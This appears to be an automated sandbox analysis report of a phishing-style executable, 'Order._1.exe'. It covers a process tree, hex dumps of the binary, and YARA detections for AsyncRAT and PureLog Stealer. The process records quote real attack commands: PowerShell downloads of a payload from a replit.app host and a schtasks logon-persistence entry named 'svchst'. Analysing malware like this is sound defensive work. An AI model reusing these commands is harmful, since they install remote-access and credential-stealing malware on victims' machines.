                    2024-07-30 09:11:29 UTC4096INData Raw: 00 bc 1d 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 e4 3b 00 00 a4 27 00 00 23 55 53 00 88 63 00 00 10 00 00 00 23 47 55 49 44 00 00 00 98 63 00 00 40 09 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 9f a2 3f 09 0a 00 00 00 fa 25 33 00 16 00 00 01 00 00 00 9b 00 00 00 1e 00 00 00 47 00 00 00 a3 00 00 00 71 00 00 00 02 00 00 00 0a 01 00 00 13 00 00 00 31 00 00 00 02 00 00 00 2e 00 00 00 04 00 00 00 13 00 00 00 20 00 00 00 04 00 00 00 03 00 00 00 06 00 00 00 06 00 00 00 02 00 00 00 01 00 00 00 08 00 00 00 04 00 00 00 01 00 00 00 00 00 f1 0a 01 00 00 00 00 00 06 00 3b 19 f0 0f 0a 00 91 00 05 16 0a 00 a1 19 74 18 0a 00 8b 0f 87 1d 06 00 2b 14 9a 0b 06 00 84 08 05 16 0a 00 a4 10 05 16 0a 00 10 18 87 1d 06 00 fb 19 f0 0f 0e 00 07 12 f1 0b 0e 00 c6 18
                    Data Ascii: #Strings;'#USc#GUIDc@#BlobW?%3Gq1. ;t+
                    2024-07-30 09:11:29 UTC4096INData Raw: 25 00 00 00 00 96 00 43 0f c5 02 61 00 0c 56 00 00 00 00 96 00 5c 0c cb 02 62 00 d4 56 00 00 00 00 96 00 38 1d d2 02 64 00 ab 25 00 00 00 00 96 00 d9 18 da 02 66 00 c6 25 00 00 00 00 96 00 2c 06 e1 02 68 00 e6 25 00 00 00 00 96 00 66 10 e8 02 6a 00 74 57 00 00 00 00 96 00 a8 00 ef 02 6c 00 a4 57 00 00 00 00 96 00 a6 13 f6 02 6e 00 78 20 00 00 00 00 86 18 03 15 0e 00 70 00 e8 58 00 00 00 00 96 00 69 18 84 01 70 00 74 59 00 00 00 00 96 00 60 18 84 01 71 00 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 a9 07 00 00 01 00 50 13 00 00 02 00 ae 08 00 00 03 00 ae 10 00 00 04 00 20 18 00 00 01 00 d0 12 00 00 01 00 17 0d
                    Data Ascii: %CaV\bV8d%f%,h%fjtWlWnx pXiptY`qP
                    2024-07-30 09:11:29 UTC4096INData Raw: 00 45 58 45 43 55 54 49 4f 4e 5f 53 54 41 54 45 00 38 37 36 33 39 31 32 36 45 41 37 37 42 33 35 38 46 32 36 35 33 32 33 36 37 44 42 41 36 37 43 35 33 31 30 45 46 35 30 41 38 44 39 38 38 38 45 44 30 37 30 43 44 34 30 45 31 46 36 30 35 41 38 46 00 67 65 74 5f 41 53 43 49 49 00 53 79 73 74 65 6d 2e 49 4f 00 49 73 58 50 00 42 44 4f 53 00 45 53 5f 43 4f 4e 54 49 4e 55 4f 55 53 00 67 65 74 5f 49 56 00 73 65 74 5f 49 56 00 47 65 6e 65 72 61 74 65 49 56 00 4d 54 58 00 76 61 6c 75 65 5f 5f 00 52 65 61 64 53 65 72 76 65 72 74 44 61 74 61 00 64 61 74 61 00 6d 73 63 6f 72 6c 69 62 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 00 67 65 74 5f 53 65 6e 64 53 79 6e 63 00
                    Data Ascii: EXECUTION_STATE87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8Fget_ASCIISystem.IOIsXPBDOSES_CONTINUOUSget_IVset_IVGenerateIVMTXvalue__ReadServertDatadatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicget_SendSync
                    2024-07-30 09:11:29 UTC1961INData Raw: 49 6d 61 67 65 43 6f 64 65 63 49 6e 66 6f 00 53 65 6e 64 49 6e 66 6f 00 46 69 6c 65 49 6e 66 6f 00 44 72 69 76 65 49 6e 66 6f 00 46 69 6c 65 53 79 73 74 65 6d 49 6e 66 6f 00 43 6f 6d 70 75 74 65 72 49 6e 66 6f 00 43 53 68 61 72 70 41 72 67 75 6d 65 6e 74 49 6e 66 6f 00 50 72 6f 63 65 73 73 53 74 61 72 74 49 6e 66 6f 00 57 72 69 74 65 4d 61 70 00 50 72 65 76 65 6e 74 53 6c 65 65 70 00 5a 69 70 00 63 75 72 72 65 6e 74 41 70 70 00 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 00 47 72 6f 75 70 00 4e 6f 72 6d 61 6c 53 74 61 72 74 75 70 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 43 6c 65 61 72 00 43 68 61 72 00 49 6e 76 6f 6b 65 4d 65 6d 62 65 72 00 4d 44 35 43 72 79 70 74 6f 53 65 72 76 69 63 65 50 72 6f 76 69 64 65 72 00 52 53 41 43 72 79 70 74 6f 53 65 72 76
                    Data Ascii: ImageCodecInfoSendInfoFileInfoDriveInfoFileSystemInfoComputerInfoCSharpArgumentInfoProcessStartInfoWriteMapPreventSleepZipcurrentAppMicrosoft.CSharpGroupNormalStartupSystem.LinqClearCharInvokeMemberMD5CryptoServiceProviderRSACryptoServ
                    2024-07-30 09:11:29 UTC4096INData Raw: 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 74 6f 72 2e 52 65 73 65 74 00 67 65 74 5f 4f 66 66 73 65 74 00 73 65 74 5f 4f 66 66 73 65 74 00 53 70 6c 69 74 00 43 6c 69 65 6e 74 4f 6e 45 78 69 74 00 53 61 6c 74 00 49 41 73 79 6e 63 52 65 73 75 6c 74 00 54 6f 55 70 70 65 72 49 6e 76 61 72 69 61 6e 74 00 57 65 62 43 6c 69 65 6e 74 00 49 6e 69 74 69 61 6c 69 7a 65 43 6c 69 65 6e 74 00 67 65 74 5f 53 73 6c 43 6c 69 65 6e 74 00 73 65 74 5f 53 73 6c 43 6c 69 65 6e 74 00 67 65 74 5f 54 63 70 43 6c 69 65 6e 74 00 73 65 74 5f 54 63 70 43 6c 69 65 6e 74 00 41 75 74 68 65 6e 74 69 63 61 74 65 41 73 43 6c 69 65 6e 74 00 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 00 45 6e 76 69 72 6f 6e 6d 65 6e 74 00 70 61 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f
                    Data Ascii: ollections.IEnumerator.Resetget_Offsetset_OffsetSplitClientOnExitSaltIAsyncResultToUpperInvariantWebClientInitializeClientget_SslClientset_SslClientget_TcpClientset_TcpClientAuthenticateAsClientSystem.ManagementEnvironmentparentSystem.Co


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:11:18
                    Start date:30/07/2024
                    Path:C:\Users\user\Desktop\Order._1.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Order._1.exe"
                    Imagebase:0x400000
                    File size:295'424 bytes
                    MD5 hash:587BE0C9BE93274C3D38EF27C3A50AA4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:05:11:18
                    Start date:30/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe"
                    Imagebase:0x7ff7cf3b0000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:05:11:18
                    Start date:30/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:05:11:18
                    Start date:30/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
                    Imagebase:0x7ff741d30000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:05:11:22
                    Start date:30/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
                    Imagebase:0x7ff741d30000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:05:11:26
                    Start date:30/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    Wow64 process (32bit):true
                    Commandline:CoinAIfdp.exe
                    Imagebase:0xc70000
                    File size:402'432 bytes
                    MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1492148271.0000000006210000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1413986233.0000000000C72000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 71%, ReversingLabs
                    • Detection: 59%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp87D1.tmp.bat""
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
                    Imagebase:0xe60000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:05:11:34
                    Start date:30/07/2024
                    Path:C:\Windows\SysWOW64\timeout.exe
                    Wow64 process (32bit):true
                    Commandline:timeout 3
                    Imagebase:0x7d0000
                    File size:25'088 bytes
                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:05:11:36
                    Start date:30/07/2024
                    Path:C:\Users\user\AppData\Roaming\svchst.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\svchst.exe
                    Imagebase:0x160000
                    File size:402'432 bytes
                    MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2587661382.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2587661382.0000000000711000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 71%, ReversingLabs
                    • Detection: 59%, Virustotal, Browse
                    Reputation:low
                    Has exited:false

                    Target ID:15
                    Start time:05:11:37
                    Start date:30/07/2024
                    Path:C:\Users\user\AppData\Roaming\svchst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\svchst.exe"
                    Imagebase:0x1f0000
                    File size:402'432 bytes
                    MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1565981743.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:16
                    Start time:05:11:39
                    Start date:30/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe"
                    Imagebase:0x780000
                    File size:402'432 bytes
                    MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1587574628.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:17
                    Start time:05:11:47
                    Start date:30/07/2024
                    Path:C:\Users\user\AppData\Roaming\svchst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\svchst.exe"
                    Imagebase:0xc00000
                    File size:402'432 bytes
                    MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.1666583354.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.1668370825.0000000003616000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:12.4%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:1.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:34
                      execution_graph 10282 402e57 10283 40dfc0 21 API calls 10282->10283 10284 402e5d 10283->10284 10285 40a4f4 5 API calls 10284->10285 10286 402e68 10285->10286 10295 40de80 GetLastError TlsGetValue SetLastError 10286->10295 10288 402e6e 10296 40de80 GetLastError TlsGetValue SetLastError 10288->10296 10290 402e76 10291 409bc0 4 API calls 10290->10291 10292 402e81 10291->10292 10293 40dec0 3 API calls 10292->10293 10294 402e90 10293->10294 10295->10288 10296->10290 7325 401000 memset GetModuleHandleW HeapCreate 7326 401044 7325->7326 7375 40de30 HeapCreate TlsAlloc 7326->7375 7328 401053 7378 40aaa0 7328->7378 7330 40105d 7381 409b40 HeapCreate 7330->7381 7332 40106c 7382 409669 7332->7382 7334 401071 7387 408dee memset InitCommonControlsEx CoInitialize 7334->7387 7336 401076 7388 4053bb InitializeCriticalSection 7336->7388 7338 40107b 7389 405068 7338->7389 7347 40a3da 16 API calls 7348 4010f4 7347->7348 7349 40a348 13 API calls 7348->7349 7350 40110f 7349->7350 7420 40dbca 7350->7420 7352 40112d 7353 405068 4 API calls 7352->7353 7354 40113d 7353->7354 7355 40a3da 16 API calls 7354->7355 7356 401148 7355->7356 7357 40a348 13 API calls 7356->7357 7358 401163 7357->7358 7426 409930 7358->7426 7360 40116f 7432 40de80 GetLastError TlsGetValue SetLastError 7360->7432 7362 401175 7433 402f41 7362->7433 7366 401186 7458 401b8f 7366->7458 7369 40119b 7565 403df3 7369->7565 7909 40e6a0 HeapAlloc HeapAlloc TlsSetValue 7375->7909 7377 40de57 7377->7328 7910 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7378->7910 7380 40aaae 7380->7330 7381->7332 7911 40d353 7382->7911 7386 409687 InitializeCriticalSection 7386->7334 7387->7336 7388->7338 7923 40e130 7389->7923 7391 401095 GetStdHandle 7392 409de0 7391->7392 7930 409ecf 7392->7930 7395 4010c3 7404 40a3da 7395->7404 7396 409e0b 7397 409e14 7396->7397 7398 409e17 HeapAlloc 7396->7398 7397->7398 7399 409e93 HeapFree 7398->7399 7401 409e2e 7398->7401 7400 409ea4 7399->7400 7400->7395 7941 40d819 7401->7941 7405 40a3e3 7404->7405 7406 4010ce 7404->7406 8010 40a496 7405->8010 7415 40a348 HeapAlloc 7406->7415 7409 40d946 9 API calls 7410 40a3f3 7409->7410 7411 40a420 7410->7411 7412 40a40e HeapFree 7410->7412 7413 40a433 HeapFree 7411->7413 7414 40a427 HeapFree 7411->7414 7412->7411 7412->7412 7413->7406 7414->7413 7416 40a367 HeapAlloc 7415->7416 7417 40a37c 7415->7417 7416->7417 7418 40d819 11 API calls 7417->7418 7419 4010e9 7418->7419 7419->7347 8017 40dd1d 7420->8017 7423 40dbe7 RtlAllocateHeap 7424 40dc06 memset 7423->7424 7425 40dc4a 7423->7425 7424->7425 7425->7352 7427 409a50 7426->7427 7428 409a58 7427->7428 7429 409a7a SetUnhandledExceptionFilter 7427->7429 7430 409a61 SetUnhandledExceptionFilter 7428->7430 7431 409a6b SetUnhandledExceptionFilter 7428->7431 7429->7360 7430->7431 7431->7360 7432->7362 8023 40dfc0 7433->8023 7437 402f56 8038 40de80 GetLastError TlsGetValue SetLastError 7437->8038 7439 402fab 8039 40de80 GetLastError TlsGetValue SetLastError 7439->8039 7441 402fb3 8040 40de80 GetLastError TlsGetValue SetLastError 7441->8040 7443 402fbb 8041 40de80 GetLastError TlsGetValue SetLastError 7443->8041 7445 402fc3 8042 40d120 7445->8042 7449 402fde 8047 405eb0 7449->8047 7451 402fe6 8057 405170 TlsGetValue 7451->8057 7453 40117c 7454 40dec0 TlsGetValue 7453->7454 7455 40df06 RtlReAllocateHeap 7454->7455 7456 40dee9 RtlAllocateHeap 7454->7456 7457 40df27 7455->7457 7456->7457 7457->7366 7459 40dfc0 21 API calls 7458->7459 7460 401b9e 7459->7460 8082 40de80 GetLastError TlsGetValue SetLastError 7460->8082 7462 401ba4 8083 40de80 GetLastError TlsGetValue SetLastError 7462->8083 7464 401bb6 8084 40de80 GetLastError TlsGetValue SetLastError 7464->8084 7466 401bbe 8085 409698 7466->8085 7470 401bca LoadLibraryExW 7471 4051a0 3 API calls 7470->7471 7472 401bd7 EnumResourceTypesW FreeLibrary 7471->7472 7489 401c02 7472->7489 7473 401e16 7473->7473 7474 401ca0 7475 40a496 4 API calls 7474->7475 7477 401cab 7475->7477 7476 40de80 GetLastError TlsGetValue SetLastError 7476->7489 8093 40de80 GetLastError TlsGetValue SetLastError 7477->8093 7479 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7479->7489 7480 401cb1 8094 40de80 GetLastError TlsGetValue SetLastError 7480->8094 7482 401cb9 8095 40de80 GetLastError TlsGetValue SetLastError 7482->8095 7484 401cc1 8096 40de80 GetLastError TlsGetValue SetLastError 7484->8096 7486 401cc9 8097 40de80 GetLastError TlsGetValue SetLastError 7486->8097 7488 401cd6 8098 40de80 GetLastError TlsGetValue SetLastError 7488->8098 7489->7473 7489->7474 7489->7476 7489->7479 7494 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7489->7494 7491 401cde 8099 405e10 7491->8099 7494->7489 7496 401cee 8108 40d100 7496->8108 7500 401cfb 7501 405eb0 6 API calls 7500->7501 7502 401d03 7501->7502 7503 40dec0 3 API calls 7502->7503 7504 401d0d 7503->7504 8112 40de80 GetLastError TlsGetValue SetLastError 7504->8112 7506 401d17 8113 40e020 7506->8113 7508 401d1f 7509 40dec0 3 API calls 7508->7509 7510 401d29 7509->7510 8118 40de80 GetLastError TlsGetValue SetLastError 7510->8118 7512 401d2f 8119 40de80 GetLastError TlsGetValue SetLastError 7512->8119 7514 401d37 8120 40de80 GetLastError TlsGetValue SetLastError 7514->8120 7516 401d3f 8121 40de80 GetLastError TlsGetValue SetLastError 7516->8121 7518 401d47 7519 40d100 8 API calls 7518->7519 7520 401d57 7519->7520 8122 405182 TlsGetValue 7520->8122 7522 401d5c 7523 405eb0 6 API calls 7522->7523 7524 401d64 7523->7524 7525 40dec0 3 API calls 7524->7525 7526 401d6e 7525->7526 8123 40de80 GetLastError TlsGetValue SetLastError 7526->8123 7528 401d74 8124 40de80 GetLastError TlsGetValue SetLastError 7528->8124 7530 401d7c 8125 405f20 7530->8125 7532 401d8c 7533 40dec0 3 API calls 7532->7533 7534 401d96 7533->7534 7534->7473 8133 40985e 7534->8133 7537 401e12 7540 40df50 HeapFree 7537->7540 7539 401db5 8139 40de80 GetLastError TlsGetValue SetLastError 7539->8139 7542 401e2b 7540->7542 7544 40df50 HeapFree 7542->7544 7543 401dbd 8140 409872 7543->8140 7546 401e34 7544->7546 7548 40df50 HeapFree 7546->7548 7550 401e3d 7548->7550 7552 40df50 HeapFree 7550->7552 7551 401dce 8150 405160 7551->8150 7554 401e46 7552->7554 7555 40df50 HeapFree 7554->7555 7556 40118b 7555->7556 7556->7369 7792 403001 7556->7792 7557 401dd9 7557->7537 8153 40de80 GetLastError TlsGetValue SetLastError 7557->8153 7559 